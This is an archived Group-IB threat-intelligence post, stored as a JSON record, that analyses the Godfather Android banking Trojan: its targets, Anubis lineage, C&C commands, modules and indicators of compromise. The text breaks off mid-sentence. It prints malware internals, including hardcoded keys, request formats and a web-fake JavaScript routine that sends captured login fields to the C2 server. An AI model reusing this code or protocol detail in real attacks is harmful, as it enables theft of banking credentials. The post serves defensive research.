{
	"id": "8bacb332-c227-4a23-aaa3-73c76a18cebc",
	"created_at": "2026-05-05T02:46:05.074811Z",
	"updated_at": "2026-05-05T02:46:37.10312Z",
	"deleted_at": null,
	"sha1_hash": "ad279fa12ff24bffde1379e9761a9209b78f304b",
	"title": "Godfather Trojan - mobile banking malware that is impossible to refuse",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3178095,
	"plain_text": "Godfather Trojan - mobile banking malware that is impossible to\r\nrefuse\r\nArchived: 2026-05-05 02:07:04 UTC\r\nThe Android banking Trojan Godfather is currently being utilized by cybercriminals to attack users of\r\npopular financial services across the globe. Godfather is designed to allow threat actors to harvest login\r\ncredentials for banking applications and other financial services, and drain the accounts. To date, its victims\r\ninclude users of over 400 international targets, including banking applications, cryptocurrency wallets, and crypto\r\nexchanges.\r\nFew people realize that hiding under Godfather’s hood is an old banking Trojan called Anubis, whose\r\nfunctionality has become outdated due to Android updates and the efforts of malware detection and prevention\r\nproviders. In this blog post, Group-IB’s Threat Intelligence team describes in detail who Godfather attacks,\r\nhow it does it, and what this banking Trojan inherited from its predecessor.\r\nGroup-IB first detected Godfather, a mobile banking Trojan that steals the banking and cryptocurrency\r\nexchange credentials of users, in June 2021. Almost a year later, in March 2022, researchers at Threat Fabric were\r\nthe first to mention the banking Trojan publicly. A few months later, in June, the Trojan stopped being circulated.\r\nOne of the reasons, Group-IB analysts believe, why Godfather was taken out of use was for developers to update\r\nthe Trojan further. Sure enough, Godfather reappeared in September 2022, now with slightly modified WebSocket\r\nfunctionality.\r\nKey Findings\r\n1. Group-IB’s Threat Intelligence detected more than 400 international financial companies targeted by\r\nthe Godfather Android banking Trojan between June 2021 and October 2022.\r\n2. Half of the targeted financial companies were banks. Cryptocurrency wallets and exchanges were also\r\ntargeted.\r\n3. Godfather’s targets include 49 US-based companies, 31 Turkish-based companies, and 30 Spanish-based companies. Financial services providers in Canada, France, Germany, UK, Italy, and Poland\r\nwere also among the most affected.\r\n4. Godfather’s predecessor is another banking Trojan named Anubis.\r\n5. Godfather’s developers used Anubis source code as a basis and modernized it for newer versions of\r\nAndroid, adding relevant features and removing others such as file encryption.\r\n6. Godfather overlays web fakes on infected devices that appear when a user interacts with a decoy\r\nnotification or tries to open one of the legitimate applications targeted by Godfather.\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 1 of 26\n\n7. Any data, such as usernames and passwords, entered on the web fakes are harvested by the threat actors.\r\nGodfather can also exfiltrate SMS and push notifications to bypass two-factor authentication.\r\n8. According to Telegram channels analyzed by Group-IB, Godfather is being distributed via the Malware-as-a-Service model.\r\n9. Based on Godfather’s network infrastructure, this banking Trojan is distributed through decoy applications\r\nhosted on Google Play.\r\nGodfather’s international targets\r\nTo date, 215 international banks, 94 cryptocurrency wallets and 110 crypto exchange platforms have fallen\r\nvictim to Godfather, as of October 2022. Most of the targeted companies are located in the United States, Turkey,\r\nSpain, Canada, Germany, France, and the UK. Interestingly, Godfather spares users in post-Soviet countries. If the\r\npotential victim’s system preferences include one of the languages in that region, the Trojan shuts down. This\r\ncould suggest that Godfather’s developers are Russian speakers.\r\nFigure 1: Who and where Godfather targets\r\nA signature technique found in the functionality of any Android banking Trojan is the use of web fakes\r\n(HTML pages created by the threat actors that are shown over legitimate applications), and Godfather has these in\r\nabundance. The fake pages that Godfather can overlay on infected devices appear after users click on decoy\r\nnotifications or open legitimate apps targeted by Godfather. All data entered into the fake web pages (such as\r\nusernames and passwords) is exfiltrated to command-and-control (C\u0026C) servers. Group-IB researchers were able\r\nto analyze some of the web fakes affecting Turkish banks, likely produced by a threat actor explicitly targeting\r\nTurkish companies, and these are provided below.\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 2 of 26\n\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 3 of 26\n\nGodfather’s functionalities also include:\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 4 of 26\n\nRecording the screen of the victim’s device\r\nEstablishing VNC connections\r\nLaunching keyloggers\r\nExfiltrating push notifications (for bypassing two-factor authentication); preceding versions of the Trojan\r\nalso exfiltrated\r\nSMS messages\r\nForwarding calls (for bypassing two-factor authentication)\r\nExecuting USSD requests\r\nSending SMS messages from infected devices\r\nLaunching proxy servers\r\nEstablishing WebSocket connections (added to the new, September 2022 version of Godfather)\r\nGone but not forgotten: Anubis, we recognize you!\r\nThe basis of Godfather is a version of the banking Trojan called Anubis, whose source code was leaked as\r\nearly as 2019. As new versions of Android were released, and malware detection and prevention providers got up\r\nto speed, many Anubis features stopped working and were thrown into the dustbin of history. But why create a\r\nnew Trojan if one has been developed already?\r\nThe developers of Godfather used Anubis source code as a basis and modernized it for newer versions of\r\nAndroid, adding relevant features and removing others such as file encryption.\r\nWe found that both Trojans, Anubis and Godfather, have the same code base, but the C\u0026C communication\r\nprotocol and capabilities, together with their implementation, were modified in Godfather. The latter can therefore\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 5 of 26\n\nbe considered an Anubis fork.\r\nComparison of Godfather and Anubis\r\nOverlaps Godfather’s differences\r\nMethod of receiving a C\u0026C address Communication protocol\r\nProcessing options from the request InjectCommandRequest Traffic encryption algorithm\r\nImplementation of commands: startUSSD, startforward,\r\nstopforward, openbrowser, startsocks5, stopsocks5, killbot,\r\nstartPush\r\nUpdated functionality (e.g, Google\r\nAuthenticator OTPs)\r\nWeb-fake module A separate module for VNC\r\nWeb fakes obtained during analysis\r\nCertain features have been removed\r\n(Godfather cannot encrypt files, record\r\naudio, or receive GPS information)\r\nImplementation of the proxy module\r\nImplementation of the ScreenCapture module\r\nGiven that the source code for Anubis is publicly available, it is not possible to claim that the two Trojans were\r\ncreated by the same developer or operated by the same threat group.\r\nA distinctive feature of Godfather is that its command-and-control (C\u0026C) servers are mentioned in Telegram\r\nchannel descriptions (this technique for obtaining C\u0026C addresses from Telegram channels has been used before\r\nfor some versions of Anubis). With the assistance of the new real-time Telegram monitoring functionalities of\r\nGroup-IB’s Threat Intelligence, our researchers received information relating to one Telegram channel\r\ncontaining messages indicating that Godfather can be distributed using the MaaS (Malware-as-a-Service) model.\r\nThese messages may be intended for operators of this Trojan. For example, the author of the message in the figure\r\nbelow is asking for a review about the service.\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 6 of 26\n\nFigure 3: A Telegram user asking for a review of the Godfather banking trojan\r\nGroup-IB analysts believe that Godfather can be distributed in a similar manner as Anubis was. Anubis\r\noperators often distributed their payloads via malicious downloader applications hosted on Google Play. Like in\r\nsome cases with Anubis, the Godfather payload imitates Google Protect. An example of the Anubis infection chain\r\nis shown in this article.\r\nAn analysis of the Trojan’s network infrastructure revealed a domain that contains the C\u0026C address of an Android\r\napplication. We could not obtain the payload, but we believe that this downloader installs Godfather on infected\r\ndevices. Below is a screenshot of Group-IB’s Graph Network Analysis tool, a feature of Group-IB’s\r\nintelligence-driven Unified Risk Platform, that shows links between the C\u0026C addresses of Godfather and the\r\ndownloaded application.\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 7 of 26\n\nFigure 4: Godfather’s network infrastructure, as detailed by Group-IB’s Graph Network Analysis tool\r\nGodfather C\u0026C addresses:\r\nhenkormerise[.]com\r\nbanerrokutepera[.]com\r\nheikenmorgan[.]com\r\nThe domain pluscurrencyconverter[.]com is the С\u0026C address of the downloader application. Below is a diagram\r\nshowing replicated DNS A records for Godfather С\u0026C addresses.\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 8 of 26\n\nFigure 5: Replicated DNS A records for Godfather’s C\u0026C addresses\r\nBelow is a screenshot of the hosted application on Google Play.\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 9 of 26\n\nFigure 6: Screenshot of malicious application linked to Godfather distribution in Google Play Store (Source:\r\n@0xabc0)\r\nBased on the correlation above, we believe that one of the ways that Godfather is distributed is via decoy\r\napplications hosted on Google Play.\r\nIn this blog post, we focus on providing a detailed analysis of two versions of Godfather:\r\nMD5: d7118d3d6bf476d046305be1e1f9b388\r\nSHA1: 2b3b78d3a62952dd88fc4da4688928ec6013af71\r\nSHA256: c79857015dbf220111e7c5f47cf20a656741a9380cc0faecd486b517648eb199\r\nVT Submission: 2022-03-22\r\nMD5: 7e061e87f9a4c27bfb69980980270720\r\nSHA1: 34d37927b35f422e7c28055ea989ef6524a668ef\r\nSHA256: b6249fa996cb4046bdab37bab5e3b4d43c79ea537f119040c3b3e138149897fd\r\nVT Submission: 2022-09-11\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 10 of 26\n\nGodfather malware responsibilities\r\nThe analyzed Godfather samples, one of which was uploaded to VirusTotal in September 2022, emulate Google\r\nProtect. After a user launches the malware, it emulates the legitimate Google application. An animation shows\r\nGoogle Protect “activity”, but the “scanner” does not actually do anything and instead Godfather’s criminal roots\r\nbecome apparent. After being launched, the malware achieves persistence on the infected device, creates a pinned\r\nnotification, and hides its icon from the list of installed applications.\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 11 of 26\n\nFigure 7: Google Protect animation\r\nInitialization also involves launching a service for requesting access to AccessibilityService, which is an Android\r\nfeature used by developers to adapt their applications to users with disabilities. Recently, AccessibilityService has\r\nbeen actively used to carry out ATS (Automated Transfer System) attacks. Access to AccessibilityService is also\r\nrequested when the “Scan” button is pressed. It is worth noting that users cannot launch the “scanning” function\r\nwithout granting the Trojan access to AccessibilityService.\r\nOf course, no scanning takes place. The scanning animation is displayed for 30 seconds, after which a message\r\nappears saying that no malicious applications were found. With access to AccessibilityService, Godfather issues\r\nitself the necessary permissions and starts communicating with the C\u0026C server.\r\nThe user assumes that there are no Trojans on the device and launches their banking application, entering\r\ntheir login details and not realizing that their data just got into the hands of threat actors.\r\nThe user eventually discovers that the money from their account is gone. They might try withdrawing the\r\npermissions or deleting the application, but the settings will keep collapsing and the device will keep returning to\r\nthe home screen.\r\nHow has the mafia boss managed to pull off such a heist? Let’s look into this.\r\nTechnical findings\r\nWhen launched for the first time, Godfather does the following:\r\nChecks system language and context\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 12 of 26\n\nInitializes SharedPreferences parameters\r\nLaunches a service to request access to AccessibilityService\r\nLaunches a service to communicate with the C\u0026C server\r\nHides its icon in the menu\r\nLet’s now look at some of the points above in more detail.\r\nChecking system language and context\r\nGodfather checks the system language, and the Trojan shuts down if the language is one of the following:\r\nRU (Russia)\r\nAZ (Azerbaijan)\r\nAM (Armenia)\r\nBY (Belarus)\r\nKZ (Kazakhstan)\r\nKG (Kyrgyzstan)\r\nMD (Moldova)\r\nUZ (Uzbekistan)\r\nTJ (Tajikistan)\r\nIt also checks for the device context in order to determine whether the Trojan was launched in an emulator.\r\nIf so, Godfather stops functioning.\r\nInitialization of SharedPreferences parameters\r\nGodfather uses SharedPreferences to store necessary settings such as the C\u0026C server, the status of required\r\npermissions, the list of targets, and log data. The configuration file is called config.xml. Parameters for storing\r\nVNC settings (settings_port, settings_password) are saved to the default settings file. This stage also involves\r\ngenerating a unique identifier (the relevant field in the traffic is called key) which is used for identifying infected\r\ndevices — this is essentially a bot ID. The generation algorithm involves choosing 15 random characters from the\r\nLatin alphabet and numbers from 0 to 9: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890.\r\nA service for requesting access to AccessibilityService\r\nThe service checks whether the malware has been granted access to AccessibilityService. If it has not, the\r\nservice requests access and creates a pop-up notification with the following text: “Enable accessibility for\r\nprotection to take effect ‘Google Protect”. This will happen every eight seconds until the user grants the malicious\r\napplication access to AccessibilityService.\r\nIn addition to being launched upon initialization, the service is launched when the victim device is restarted,\r\nturned on, or unlocked. You can find more information about what access to AccessibilityService is used for in the\r\n“AccessibilityService” section of this article.\r\nA service for communicating with the C\u0026C server\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 13 of 26\n\nThis service creates a task that is executed every 70 seconds. The service is launched when the device is turned\r\non, restarted, or unlocked. Before obtaining the C\u0026C server and communicating with it, the Trojan checks for\r\nthe necessary permissions (writing to external storage, reading contacts, reading the device status, and making\r\ncalls). If the Trojan does not have these permissions, it does the following:\r\nRequests the necessary permissions\r\nExfiltrates contacts\r\nExfiltrates the list of installed applications\r\nIn addition, the Trojan checks for administrator privileges. If they are not present, the malware requests them.\r\nNext, the Trojan communicates with the C\u0026C server to receive commands and turn on its modules. Network\r\nrequests, as well as commands that can be executed as a result of these requests, are described in the “Network\r\ncommunication” section of this article.\r\nTrojan Godfather network communication\r\nFigure 8: Communication between Godfather and C\u0026C addresses\r\nThe figure above shows Godfather’s communication with a C\u0026C address, which can be broken down into\r\nthree parts:\r\n1. Receiving an up-to-date C\u0026C address\r\n2. Receiving general commands (RatCommandRequest)\r\n3. Receiving commands for launching malware modules (InjectCommandRequest)\r\nIt is worth noting that RatCommandRequest and InjectCommandRequest commands are requested simultaneously.\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 14 of 26\n\nGodfather does not have an up-to-date list of C\u0026C addresses. Instead, it receives them from Telegram channel\r\ndescriptions by executing an HTTP request (the GetC2Request in the figure above). An example of a Telegram\r\nchannel with an encrypted C\u0026C address is shown below. The up-to-date C\u0026C address is encrypted using Blowfish\r\n(ECB mode), where the key is the string ABC. The same algorithm is used to decrypt received commands, which\r\nthe application requests from the C\u0026C server immediately after receiving the C\u0026C address. As mentioned earlier\r\nin the article, there are two modules for receiving commands: regular commands and commands for enabling and\r\ndisabling the Trojan modules (RatCommandRequest and InjectCommandRequest in the figure above).\r\nFigure 9: Example of Telegram channel with encrypted C\u0026C address\r\nRatCommandRequest\r\nThis request is used for receiving commands and a list of victim applications. Request parameters contain the\r\nfollowing information about the device:\r\nName of the network operator\r\nPhone status (locked or unlocked)\r\nWhether AccessibilityService permissions have been granted\r\nWhether the Trojan’s service for handling SMS messages has been installed\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 15 of 26\n\nWhether the necessary permissions have been granted (writing to external storage, reading contacts,\r\nreading the device status, and making calls)\r\nThe default user-agent for the device\r\nWhether the device is being charged (the new version does not have this feature)\r\nThe country code of the current network operator\r\nBot ID (the key parameter)\r\nWhether the screen is currently being recorded\r\nList of installed applications\r\nAndroid version\r\nDevice model\r\nExample of a request body:\r\n{country=us, new=true, ver=8.1.0, accessibility=true, ag=Mozilla/5.0 (Linux; Android 8.1.0; Google Pi\r\nThe server response is in the following format:\r\n%СOMMAND%|%PARAM1%|%PARAM2%|%PARAM3%|%PARAM4%\r\nThe table below shows commands that can be sent to the bot from the C\u0026C server:\r\nstartUSSD Execute a USSD request (the request comes from the server as a parameter).\r\nsentSMS\r\nIn newer versions this command is not processed, but such commands were\r\nprocessed in older versions that were distributed from June 2021. It sent SMS\r\nmessages from the infected device (the phone number and the message text are\r\nreceived from the server as parameters).\r\nstartApp\r\nLaunch the application (the name of the application package is received from the\r\nserver as a parameter).\r\ncachecleaner\r\nClear the cache of the application (the name of the package is received from the\r\nserver as a parameter).\r\nBookSMS\r\nThis command is currently not implemented, but in versions distributed in\r\nSeptember 2021, it sent SMS messages to all contacts (the message text is\r\nreceived from the server as a parameter).\r\nstartforward/stopforward\r\nEnable and disable call forwarding (the phone number is received from the server\r\nas a parameter).\r\nopenbrowser Open an arbitrary web page (the URL is received from the server as a parameter).\r\nstartsocks5/stopsocks5\r\nEnable and disable a SOCKS5 proxy (host, user, pass, and port are received from\r\nthe server as parameters).\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 16 of 26\n\nkillbot Self-delete.\r\nstartPush\r\nShow push notifications that, when pressed on, open a web page (web fake). The\r\nparameters appname, title, and text are received from the server together with the\r\ncommand.\r\nInjectCommandRequest\r\nAs mentioned earlier in the article, this request is used for enabling/disabling various modules of the Trojan. The\r\nactions that can be performed as a result of this request are:\r\nEnable a keylogger\r\nLaunch a VNC server\r\nRecord the screen\r\nLock the screen\r\nExfiltrate and block notifications\r\nEnable silent mode\r\nEstablish a WebSocket connection\r\nDim the screen\r\nThis request does not send any information about the infected device to the server. Below is an example of request\r\nparameters.\r\n{inject_check=true, key=XQFGCGFTWXMH6PC}\r\nThe server’s response is in the following format: {0}:{1}:{2}:{3}:{4}:{5}:{6}:{7}:{8}:{9}:{10}:{11}:{12}:{13}:\r\n{14}:{15}:{16} (Example:\r\n“Injection::false::close:close:open:close:close:close:close:close:close:none::close:close“). The {*} values are\r\nparameters that are processed. The table below describes each parameter.\r\n{0} Contains the string Injection, which is needed to start processing the remaining parameters.\r\n{1}\r\nThis parameter is used for delivering a list of packages for which – if the packages are launched –\r\nweb fakes will be downloaded and shown.\r\n{2}\r\nIf this parameter contains the value true, the option of exfiltrating and deleting SMS messages from\r\nthe device will be enabled. Otherwise, the option will be disabled.\r\n{3}\r\nContains the server for establishing a reverse VNC connection (the VNC connection is established on\r\nport 5500)\r\n{4}\r\nThis parameter must contain the value open for a reverse VNC connection to the server specified in\r\nthe parameter {3}.\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 17 of 26\n\n{5}\r\nIf this parameter contains the value open, silent mode is enabled and a task is launched that will\r\nunlock the device every 30 seconds. This option makes it possible to receive and execute commands\r\nfrom the server when the device is locked.\r\n{6}\r\nIf this parameter contains the value open, a keylogger is launched. Otherwise, it is disabled (this is the\r\nonly parameter that was seen enabled during our analysis).\r\n{7} If this parameter contains the value open, a VNC server is launched.\r\n{8} If this parameter contains the value open, the VNC server is stopped.\r\n{9} If this parameter contains the value open, screen recording settings are reset.\r\n{10} If this parameter contains the value open, screen recording starts.\r\n{11} If this parameter contains the value open, the screen is locked.\r\n{12}\r\nIf this parameter contains the value open, notification exfiltration is enabled. Otherwise, notification\r\nexfiltration is stopped.\r\n{13} Package name of the app that will be turned off if the app is launched on the device.\r\n{14}\r\nAddress of the server with which a WebSocket connection will be established to control the infected\r\ndevice remotely.\r\n{15}\r\nIf this parameter contains the value open, a WebSocket connection is established (the address is\r\ncontained in the option above).\r\n{16} If this parameter contains the value open, the screen is dimmed.\r\nThe URI for requests is contained within the Trojan. Some of the requests found during file analysis include:\r\n/aks.php\r\n/ads.php\r\n/forwadingx.php\r\nData exfiltration\r\nWhile the Trojan is operational, data that threat actors are interested in is exfiltrated to the C\u0026C server.\r\nThis is done using requests with the following parameters:\r\nkey (bot ID)\r\nmessage (collected data in an encrypted form)\r\nnumber (“true”)\r\npage (type of exfiltrated data)\r\nExample of a request:\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 18 of 26\n\n{number=true, page=1, message=f8d2382f72890b1975e1f149d07fdd3c36fff1d523e4ea83b2b1f593f956e7a0, key=D\r\nThe field message contains information in encrypted form. The encryption algorithm is AES (CBC mode),\r\nwhere the key is 0123456789abcdef and the initialization vector is fedcba9876543210. The field page indicates\r\nthe type of exfiltrated data and has one of the following values: 1, 2, 4, 5. The table below describes exfiltrated\r\ndata according to the page type.\r\nPage Message\r\n1\r\nThe field contains one of the following:\r\nContacts list\r\nOne-time Google Authenticator passwords (com.google.android.apps.authenticator2)\r\nInformation about starting/stopping call forwarding\r\nInformation about starting/stopping a proxy\r\nInformation about received notifications (if the notification exfiltration option is enabled)\r\n2\r\nInformation about events tracked by the keylogger:\r\nTYPE_VIEW_CLICKED\r\nTYPE_VIEW_FOCUSED\r\nTYPE_VIEW_TEXT_CHANGED\r\nTYPE_WINDOW_STATE_CHANGED\r\nThis request is executed if the size of the collected information exceeds 12,000 bytes.\r\n4\r\nInformation about received SMS messages (the new, September 2022 version does not have this\r\nfeature).\r\n5 Contents of fields used for entering PINs or passwords.\r\nAccessibilityService\r\nAn important detail about Godfather is that it will not work if it is not granted access to AccessibilityService. The\r\nTrojan’s event handler has the following functionalities:\r\nLimiting the user’s ability to remove the Trojan from the system (if the user opens application settings or\r\nedits the list of applications that have administrator privileges, these windows will be closed)\r\nProviding the necessary permissions, such as SMS and notification processing, screen recording, and\r\nadministrator privileges\r\nExfiltrating Google Authenticator one-time passwords (OTPs) (com.google.android.apps.authenticator2)\r\nsimilar to Cerberus\r\nExfiltrating the contents of fields used for entering PINs or passwords\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 19 of 26\n\nIf an app included in the list of target applications is launched, the app’s screen will be recorded (if the\r\noption for turning the screen recording module on has been received) or a web fake will be shown (if the\r\napp is in the list of applications received from the server to download the web fake)\r\nProcessing commands: cachecleaner, killbot\r\nExfiltrating the results of USSD requests if the command startUSSD was received\r\nAccessibilityService includes handling the keylogger functionality. Below are templates for specific event types:\r\nEvent type Log template\r\nTYPE_VIEW_CLICKED\r\n“Package:” + %PACKAGE% + “|Time: ” + %DATE%\r\n(MM/dd/yyyy, HH:mm:ss) + “|[(CLICKED)]” + %DATA% +\r\n“{line}”\r\nTYPE_VIEW_FOCUSED\r\n“Package:” + %PACKAGE% + “|Time: ” + %DATE%\r\n(MM/dd/yyyy, HH:mm:ss) + “|[(FOCUSED)]” + %DATA% +\r\n“{line}”\r\nTYPE_VIEW_TEXT_CHANGED\r\n“Package:” + %PACKAGE% + “|Time: ” + %DATE%\r\n(MM/dd/yyyy, HH:mm:ss) + “|[(TEXT)]” + %DATA% + “{line}”\r\nTYPE_WINDOW_STATE_CHANGED\r\n“Package:” + %PACKAGE% + “|Time: ” + %DATE%\r\n(MM/dd/yyyy, HH:mm:ss) + “|[(WINDOW)]” + %DATA% +\r\n“{line}”\r\nIf the event TYPE_NOTIFICATION_STATE_CHANGED is triggered and the notification exfiltration option is\r\nenabled, the contents of the notification will be sent to the C\u0026C server.\r\nProxy module\r\nOn infected devices, Godfather can launch a backconnect proxy server, for which port 34500 is used (located\r\nin the body of the Trojan). The Trojan opens and configures this port for handling the SOCKS5 protocol.\r\nParameters (host, user, pass, port) necessary for implementing a proxy are received together with a command for\r\nlaunching a proxy (startsocks5).\r\nGodfather Trojan VNC module\r\nGodfather implements VNC functionality using two native libraries, which are stored in the Trojan’s resources in\r\nencrypted form. The encryption algorithm is AES (ECB mode), where the key is the string\r\nGWy8tfjp4mXpu58fCRpWCLxqHV8YmeHR. The libraries are stored in the Trojan’s resources with the following\r\nnaming convention: lib.%ARCHITECTURE%.godfat.so, lib.%ARCHITECTURE%.vncserver.so. It is worth noting\r\nthat in the new version of the Trojan these libraries are stored in unencrypted form and have the following names:\r\nlibspotify.so, libjson.so.\r\nlib.%ARCHITECTURE%.vncserver.so is an open-source library used for implementing VNC connections. The\r\ncode of this library is available at GitHub.\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 20 of 26\n\nThe library lib.%ARCHITECTURE%.godfat.so is a JNI (Java Native Interface) wrapper that is required for the\r\nabovementioned Unix library to function correctly.\r\nTransferring control via VNC occurs in two stages:\r\n1. The C\u0026C server sends a command to start the VNC module.\r\n2. The C\u0026C server sends an address to which the infected device will connect and transfer VNC control\r\n(establish a reverse VNC connection)\r\nWhen the command to launch a VNC server is received, no parameters from the server are processed. Below are\r\nstatic parameters that are used when the server is launched:\r\nport: the value of the SharedPreferences settings_port parameter (by default the value is 5900)\r\nuser: the value of the system settings bluetooth_name parameter\r\npass: the value of the SharedPreferences settings_password parameter (by default the value is 123).\r\nWhen the command for establishing a reverse VNC connection is processed, the “host” parameter to which the\r\nreverse connection will be established is transferred. The port for the connection is contained in the Trojan and has\r\nthe value 5500 (the default port for the reverse VNC connection).\r\nThe figure below shows the process of connecting to a remote VNC client.\r\nFigure 10: How Godfather connects to remote VNC clients\r\nScreenCapture module\r\nThis module is used for recording the screen of an infected device and then exfiltrating the recording to the C\u0026C\r\nserver. The module makes it possible to steal data entered by the user in legitimate applications as well as any\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 21 of 26\n\ninformation contained in an application that Godfather targets. This module is launched in one of two cases:\r\nA relevant command has been received from the server\r\nAn application from the target list has been launched (the malware should receive this list in advance)\r\nIt is worth mentioning that some of the package names from the list were intentionally altered (the character 1 was\r\nadded to the package names) to prevent the module from being launched. It is possible that the threat actors have\r\nnot yet decided what they will do with the data they receive or they simply lost interest in these applications\r\nduring the testing stage. The screen is recorded using standard Android classes:\r\nandroid.media.projection.MediaProjectionManager\r\nandroid.media.projection.MediaProjection\r\nThe screen recording is saved to a file whose path is created according to the following template:\r\n%DEFAULT_DIRECTORY_MOVIES%/%KEY%_%CURRENT_TIME_MS%.mp4\r\nThe screen is recorded for two minutes. The resulting file is sent to the C\u0026C server. The URL for sending the file\r\nis created according to the following template:\r\n%DECRYPTED_C2%/mp4_recorder.php\r\nBelow is the format of the request body:\r\n--*****\\r\\nContent-Disposition: form-data; name=\\\"myfile\\\";filename=\\\"%FILENAME%\\\"\\r\\n\\r\\n%FILE_CONTE\r\nFor the screen recording to be initialized, the relevant options received from the C\u0026C server must be enabled and\r\nthe relevant permissions must be obtained.\r\nWebSocket module\r\nThis module was added to the updated September 2022 version of the banking Trojan. The module makes it\r\npossible to use a persistent WebSocket connection to control an infected device. At the moment, Godfather\r\nprocesses three types of messages from the server:\r\nPerform the action “Back”\r\nExecute clicks\r\nEnter text into fields\r\nThe address of the server to which the connection will be established must first be received from the C\u0026C server\r\nas an option in the request InjectCommandRequest.\r\nWeb-fake module\r\nLike Anubis, Godfather has a module for downloading and displaying web fakes. The method of exfiltrating\r\ndata from a web fake to the C\u0026C server in Godfather is the same as in Anubis.\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 22 of 26\n\nWeb fakes can be downloaded in two cases: if the user has followed the decoy push notification or if an\r\napplication in the target list has been opened.\r\nIn the case of a fake push notification, a notification icon will be downloaded in addition to the web fake. The icon\r\nis located at a URL in the following format:\r\n%DECRYPTED_C2%/icon/%PACKAGE_NAME%.png\r\n%PACKAGE_NAME% is the package name for the application that the fake push notification mimics. The URL\r\nfor downloading web fakes is formed according to the following template:\r\n%DECRYPTED_C2%/itor/fafa.php?f=%PACKAGE_NAME%\u0026p=%KEY%|%LOCALE%\r\n%KEY% is the key sent as a parameter in the requests mentioned above. %LOCALE% is the system language. The\r\nuser-agent used when the request is executed is:\r\nMozilla/5.0 (Linux; Android 9; SM-J730F Build/PPR12.180610.011; wv) AppleWebKit/537.36 (KHTML, like\r\nGecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36\r\nfunction submit_data(form) {\r\n var json = {};\r\n for( var i = 0 ; i \u003c form.length ; i++ )\r\n {\r\n var input = form[i];\r\n if ( input.type == \"submit\" )\r\n continue;\r\n json[ form[i].name ] = form[i].value;\r\n }\r\n logs = \"\"\r\n $.each(json, function(i, v) {\r\n logs = logs + \"\" + i + \":\" + v + \"//br//\";\r\n });\r\n top['closeDlg'] = true;\r\n var url = '%C2%';\r\n var imei_c = '%KEY%|%LOCALE%';\r\n location.replace(url + '/sender_new.php?p=' + imei_c + \"|Injection_10|%PACKAGE_NAME%|\" + logs+'|91\r\n}\r\nThe HTML pages obtained as part of our analysis contain a JS script (the example is shown above), which is used\r\nfor processing an authorization form. When an authorization attempt is made, a request to the C\u0026C server is\r\nexecuted. The request URL is formed according to the following template:\r\n%DECRYPTED_C2%/sender_new.php?\r\np=%KEY%|%LOCALE%|Injection_10|%PACKAGE_NAME%|%FORMATTED_DATA%\r\n%FORMATTED_DATA% is a string formed according to the following template:\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 23 of 26\n\n%FIELD_NAME%:%FIELD_VALUE%//br//%FIELD_NAME%:%FIELD_VALUE%//br//\r\nConclusion\r\nSometimes the sequel really can be better than the original. The case of Godfather highlights how quickly\r\nTrojan developers can adapt their tools and stay one step ahead of their Android counterparts. Additionally,\r\nit shows how easily available source code, such as that of Anubis, can be modernized and relaunched, especially\r\nunder the Malware-as-a-Service model.\r\nThe lack of direct communication between the threat actor and victim also makes Godfather an effective\r\nmalware type. Of course, Godfather shuts down on an infected device if it detects that the user is from Russia or\r\na CIS country, but this model allows the malware to be spread across the world, given that all that is required is\r\nthe creation of a web fake impersonating a bank or an e-wallet provider in a particular country.\r\nBy imitating Google Protect, Godfather can easily go undetected on infected devices. Unwitting users believe\r\nthey are being protected by an Android service, but in fact, the malicious actors gain access to their banking and\r\nfinancial portal accounts. While Group-IB does not have definitive data on the amount of money stolen by\r\noperators of Godfather, the methods harnessed by malicious actors are cause for concern.\r\nRecommendations on how to protect against Godfather\r\nThe security of mobile applications and operating systems is improving rapidly. However, it is too early to write\r\nAndroid banking Trojans off completely. In our experience, banking Trojans are still highly active and threat\r\nactors widely distribute modified Trojans whose source code is publicly available. A good example of this\r\ntrend is Godfather, which is damaging to not only end users of banking applications but also the entire banking\r\nsector itself.\r\nFor users\r\narrow_drop_down\r\nBelow are some basic recommendations on how to protect mobile devices from banking Trojans like\r\nGodfather.\r\nAlways check for updates on your mobile device. The more recent the version of Android, the less\r\nvulnerable the device is to such threats.\r\nDo not download applications from sources other than Google Play (however, even Google Play cannot\r\nguarantee total security). Check what permissions an application requests before installing it.\r\nAlways check what permissions an application requests (in the case of Godfather, communication between\r\nthe Trojan and the server only takes place after access to AccessibilityService has been granted).\r\nDo not visit third-party and suspicious resources.\r\nDo not follow links in SMS messages.\r\nIf your device has been infected, do the following:\r\n1. Disable network access.\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 24 of 26\n\n2. Freeze any bank accounts that may have been accessed from your device.\r\n3. Contact experts to receive detailed information about the risks that the malware could pose to your device.\r\nFor organizations\r\narrow_drop_down\r\nThe Group-IB Threat Intelligence team will continue to track Godfather and update our database with new\r\nindicators related to this trojan. Additionally, our Threat Intelligence team will notify customers in cases in\r\nwhich their application is targeted by Godfather, or any other Android malware that we track.\r\nFor organizations that wish to protect their customers, implementing a solution that monitors user sessions such as\r\nGroup-IB Fraud Protection will stop malware operators from defrauding their clients and damaging their\r\nreputation.\r\nGroup-IB’s Fraud Protection detects the latest fraud techniques, phishing 